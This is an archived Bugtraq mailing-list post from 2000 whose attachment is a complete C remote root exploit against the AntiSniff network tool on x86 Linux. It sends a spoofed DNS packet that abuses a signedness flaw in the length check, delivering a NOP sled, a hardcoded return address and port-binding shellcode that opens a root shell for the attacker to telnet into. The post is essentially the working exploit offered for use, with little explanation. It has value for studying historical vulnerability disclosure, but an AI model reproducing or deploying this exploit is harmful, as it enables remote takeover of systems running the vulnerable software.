5104768 2000-05-17 20:24 /180 rader/ Postmaster Mottagare: Bugtraq (import) <10878> Ärende: antisniff x86/linux remote root exploit ------------------------------------------------------------ including "fixed" 1.02 version Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="2fHTh5uZTiUOsy+g" Message-ID: <20000516213627.A31875@nb.in-berlin.de> Date: Tue, 16 May 2000 21:36:27 +0200 Reply-To: Sebastian <scut@NB.IN-BERLIN.DE> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Sebastian <scut@NB.IN-BERLIN.DE> X-To: bugtraq@securityfocus.com, mudge@l0pht.com, tesopub@coredump.cx To: BUGTRAQ@SECURITYFOCUS.COM --2fHTh5uZTiUOsy+g Content-Type: text/plain; charset=us-ascii Hi, have fun with this, ciao, scut -- - scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ --- you don't need a -- -- lot of people to be great, you need a few great to be the best ------------ http://3261000594/scut/pgp - 5453 AC95 1E02 FDA7 50D2 A42D 427E 6DEF 745A 8E07 -- data in VK/USA Mayfly experienced, awaiting transfer location, hi echelon - --2fHTh5uZTiUOsy+g Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="l0phtl0phe.c" /* l0phtl0phe.c - antisniff exploit (1.02 included) * * -sc/teso * * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines` * * description: * l0pht messed up the fix for their problem in antisniff by not regarding * the type signedness properties of the char and int values used. this * results in a cool method bypassing the too extra checks (length + strncat). * some work on this topic have been done by mixter, (bad results on type * casting), but it should be obvious to any security conscious programmers. * i'm not stating that they aren't allowed errors, but they should fix it * for sure if they're going to fix it at all. -sc. * * greetings to all teso, lam3rz, hert, adm, w00w00 and lds ppl. */ #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <arpa/nameser.h> #include <libnet.h> #define OFFSET 0xbffef9a0 unsigned int build_xp (unsigned char *xp); int main (int argc, char *argv[]) { int sock; /* raw socket */ u_long src_ip, dst_ip; unsigned char xpbuf[512]; /* this one gets complicated now */ unsigned char tpack[512]; /* paket buffer */ unsigned int pl_len; if (argc != 3) { printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]); exit (EXIT_FAILURE); } sock = libnet_open_raw_sock (IPPROTO_RAW); if (sock == -1) { perror ("libnet_open_raw_sock"); exit (EXIT_FAILURE); } src_ip = libnet_name_resolve (argv[1], 0); dst_ip = libnet_name_resolve (argv[2], 0); pl_len = build_xp (xpbuf); libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP, src_ip, dst_ip, NULL, 0, tpack); libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0, tpack + IP_H); libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0, xpbuf, pl_len, tpack + IP_H + UDP_H); libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len); /* they use "udp and dst port 53" as bpf, so we should have no problem */ libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len); libnet_close_raw_sock (sock); printf ("exploitation succeeded.\n"); printf ("try: \"telnet %s 17664\" now.\n", argv[2]); exit (EXIT_SUCCESS); } /* build_xp * * build exploit buffer into buffer pointed to by `xp'. */ unsigned int build_xp (unsigned char *xp) { /* yea yea ugly buffer ;-) */ unsigned char buf[] = "\x7c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x01" "\x7d\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x08\x00" "\xfe\x10\x10\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\xeb\x20" "\x90\x90\x90\x90" "\x3c\xf8\xfe\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* portshell 17644 portshellcode by smiler & scut */ "\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0" "\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1" "\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe" "\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66" "\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16" "\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08" "\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0" "\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0" "\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe" "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31" "\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c" "\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8" "\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; buf[287] = (OFFSET ) & 0xff; buf[288] = (OFFSET >> 8) & 0xff; buf[289] = (OFFSET >> 16) & 0xff; buf[290] = (OFFSET >> 24) & 0xff; memcpy (xp, buf, sizeof (buf)); return (sizeof (buf));; } --2fHTh5uZTiUOsy+g-- (5104768) ------------------------------------------(Ombruten)